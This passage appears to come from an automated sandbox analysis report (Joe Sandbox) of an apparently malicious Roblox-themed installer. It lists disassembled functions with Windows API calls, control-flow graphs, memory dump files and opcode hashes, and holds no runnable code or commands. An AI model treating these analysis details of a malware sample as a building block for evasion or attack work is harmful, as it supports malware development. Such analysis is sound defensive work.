                                                                                                  • Opcode ID: ed8796b6b8b811556b22073a875dba6405b7e92134aaa1dd4f8388c53f62e00e
                                                                                                  • Instruction ID: ea787a7c4d93188201bb8a45ef0e8ba30040ccc2b70c8b3775a2ec2e8878a60d
                                                                                                  • Opcode Fuzzy Hash: ed8796b6b8b811556b22073a875dba6405b7e92134aaa1dd4f8388c53f62e00e
                                                                                                  • Instruction Fuzzy Hash: E8E08C32100614ABCF213BA0FC0DB893FA8EF54792F1484A1F61CA61B0DE71CA428BA0
                                                                                                  Function 00B2A1C5 Relevance: 2.6, APIs: 2, Instructions: 125COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,?,00B14464,00C3C1C8,0000000C), ref: 00B2A1C9
                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00B2A26B
                                                                                                    • Part of subcall function 00B2B99B: RtlAllocateHeap.NTDLL(00000008,?,?,?,00B2A212,00000001,00000364,?,00000006,000000FF,?,00B14464,00C3C1C8,0000000C), ref: 00B2B9DC
                                                                                                    • Part of subcall function 00B2A4B0: RtlFreeHeap.NTDLL(00000000,00000000,?,00B32F19,?,00000000,?,?,00B331BA,?,00000007,?,?,00B33665,?,?), ref: 00B2A4C6
                                                                                                    • Part of subcall function 00B2A4B0: GetLastError.KERNEL32(?,?,00B32F19,?,00000000,?,?,00B331BA,?,00000007,?,?,00B33665,?,?), ref: 00B2A4D1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1450278743.0000000000810000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1450897262.0000000000B58000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451042641.0000000000C40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451084594.0000000000C45000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451141891.0000000000CF0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451176737.0000000000CF8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D02000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D07000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D21000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000DA9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E86000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E8C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E92000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F9C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000FED000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000103F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001090000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000010E1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001132000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001183000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000011D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001225000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001276000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000012C8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001319000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000136A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000013BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000191E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000195E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001961000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1453134631.0000000001963000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$Heap$AllocateFree
                                                                                                  • String ID:
                                                                                                  • API String ID: 2037364846-0
                                                                                                  • Opcode ID: 3a55d70ad5479078cf478c31921f326c0f5a5db3e6a2a635e5279d75873532aa
                                                                                                  • Instruction ID: bc51789bd875b183b1da464acc1ef3f5468b269cca91ec4e5591bda13a2056e6
                                                                                                  • Opcode Fuzzy Hash: 3a55d70ad5479078cf478c31921f326c0f5a5db3e6a2a635e5279d75873532aa
                                                                                                  • Instruction Fuzzy Hash: 6431E871A45632ABD6113774BC86F3E2AD8DB41BB9B1002F0F51DA21E1DEA58D0982A3
                                                                                                  Function 00B2B99B Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 152 b2b99b-b2b9a6 153 b2b9b4-b2b9ba 152->153 154 b2b9a8-b2b9b2 152->154 156 b2b9d3-b2b9e4 RtlAllocateHeap 153->156 157 b2b9bc-b2b9bd 153->157 154->153 155 b2b9e8-b2b9f3 call b0e672 154->155 162 b2b9f5-b2b9f7 155->162 158 b2b9e6 156->158 159 b2b9bf-b2b9c6 call b29cb0 156->159 157->156 158->162 159->155 165 b2b9c8-b2b9d1 call b325ed 159->165 165->155 165->156
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(00000008,?,?,?,00B2A212,00000001,00000364,?,00000006,000000FF,?,00B14464,00C3C1C8,0000000C), ref: 00B2B9DC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1450278743.0000000000810000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1450897262.0000000000B58000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451042641.0000000000C40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451084594.0000000000C45000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451141891.0000000000CF0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451176737.0000000000CF8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D02000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D07000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D21000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000DA9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E86000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E8C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E92000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F9C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000FED000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000103F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001090000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000010E1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001132000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001183000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000011D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001225000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001276000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000012C8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001319000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000136A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000013BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000191E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000195E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001961000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1453134631.0000000001963000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: c1f545a2cb348c1211eeec35a5ec2c5214950ce9fd89a08d150f20b84063dc3e
                                                                                                  • Instruction ID: 2932e0999320895b7f0c786c24f53534e0cf462c7d76c35e4e86cfecb1476683
                                                                                                  • Opcode Fuzzy Hash: c1f545a2cb348c1211eeec35a5ec2c5214950ce9fd89a08d150f20b84063dc3e
                                                                                                  • Instruction Fuzzy Hash: 0FF0BE312052316B9B326B62BC42F5A3BC8EF517B1B148093EA1CE6194CF20EC8186A0
                                                                                                  Function 00B2A4EA Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 168 b2a4ea-b2a4f6 169 b2a528-b2a533 call b0e672 168->169 170 b2a4f8-b2a4fa 168->170 178 b2a535-b2a537 169->178 171 b2a513-b2a524 RtlAllocateHeap 170->171 172 b2a4fc-b2a4fd 170->172 174 b2a526 171->174 175 b2a4ff-b2a506 call b29cb0 171->175 172->171 174->178 175->169 180 b2a508-b2a511 call b325ed 175->180 180->169 180->171
                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00B1463C,00B2A27F,?,00B23C3D,00C3C588,00000018,00000003), ref: 00B2A51C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1450278743.0000000000810000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1450897262.0000000000B58000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451042641.0000000000C40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451084594.0000000000C45000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451141891.0000000000CF0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451176737.0000000000CF8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D02000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D07000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D21000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000DA9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E86000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E8C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E92000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F9C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000FED000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000103F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001090000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000010E1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001132000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001183000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000011D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001225000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001276000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000012C8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001319000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000136A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000013BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000191E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000195E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001961000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1453134631.0000000001963000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: 480e0bb913040398a08ebdc059501383921171a2c2f1c61975754216d6925ca7
                                                                                                  • Instruction ID: e58e185c6552acf6ae42ee59ee239ad21d612be2aa4f3f721dcdb9037ca03879
                                                                                                  • Opcode Fuzzy Hash: 480e0bb913040398a08ebdc059501383921171a2c2f1c61975754216d6925ca7
                                                                                                  • Instruction Fuzzy Hash: 47E0ED312012315BEA3127A5BC20B6B3ACCEF613B1F1101E0AD5CA20E0DE64CD0182A3
                                                                                                  Function 00B27A3B Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 183 b27a3b-b27a69 call b03198 call b27793 187 b27a6e-b27a73 call b03175 183->187
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1450278743.0000000000810000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1450897262.0000000000B58000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451042641.0000000000C40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451084594.0000000000C45000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451141891.0000000000CF0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451176737.0000000000CF8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D02000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D07000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D21000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000DA9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E86000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E8C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E92000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F9C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000FED000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000103F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001090000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000010E1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001132000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001183000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000011D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001225000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001276000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000012C8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001319000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000136A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000013BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000191E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000195E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001961000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1453134631.0000000001963000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: H_prolog3
                                                                                                  • String ID:
                                                                                                  • API String ID: 431132790-0
                                                                                                  • Opcode ID: 0da8359d014ae50235125a7176857f705708790306614ed90f353bbe6ed69e27
                                                                                                  • Instruction ID: dffffbba7a3ec08d93708e48dc610ba55f5cb44f138c51060e9b47c68bdd66de
                                                                                                  • Opcode Fuzzy Hash: 0da8359d014ae50235125a7176857f705708790306614ed90f353bbe6ed69e27
                                                                                                  • Instruction Fuzzy Hash: D5E09A76C4020EAADB00DFD4C496BEFBBFCAB08700F504466A205E7181EA7497458BA1

                                                                                                  Non-executed Functions

                                                                                                  Function 00B0E378 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00B0E470
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00B0E47A
                                                                                                  • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00B0E487
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1450278743.0000000000810000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1450897262.0000000000B58000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451042641.0000000000C40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451084594.0000000000C45000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451141891.0000000000CF0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451176737.0000000000CF8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D02000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D07000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D21000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000DA9000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E86000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E8C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000E92000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000EF8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000F9C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000FED000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000103F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001090000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000010E1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001132000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001183000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000011D4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001225000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001276000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000012C8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001319000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000136A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.00000000013BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000191E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.000000000195E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000001961000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1453134631.0000000001963000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                  • String ID: [8
                                                                                                  • API String ID: 3906539128-2721712938
                                                                                                  • Opcode ID: 1d93e8090e794692647d86de713ede4c5de58497acc40f9e88892411b4620add
                                                                                                  • Instruction ID: fb494a68f6727896180d42d6d31b0f6870e9e278839623d9db4f1be2ca63bb0b
                                                                                                  • Opcode Fuzzy Hash: 1d93e8090e794692647d86de713ede4c5de58497acc40f9e88892411b4620add
                                                                                                  • Instruction Fuzzy Hash: 0E31C5749012189BCB21DF29D889B8CBBF8FF08310F5041DAE41CA7291EB709F858F45
                                                                                                  Function 00B2D13C Relevance: .0, Instructions: 22COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1450278743.0000000000810000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1450897262.0000000000B58000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451042641.0000000000C40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451084594.0000000000C45000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451141891.0000000000CF0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451176737.0000000000CF8000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1451243879.0000000000D02000.00000004.00000001.01000000.00000006.sdmpDownload File
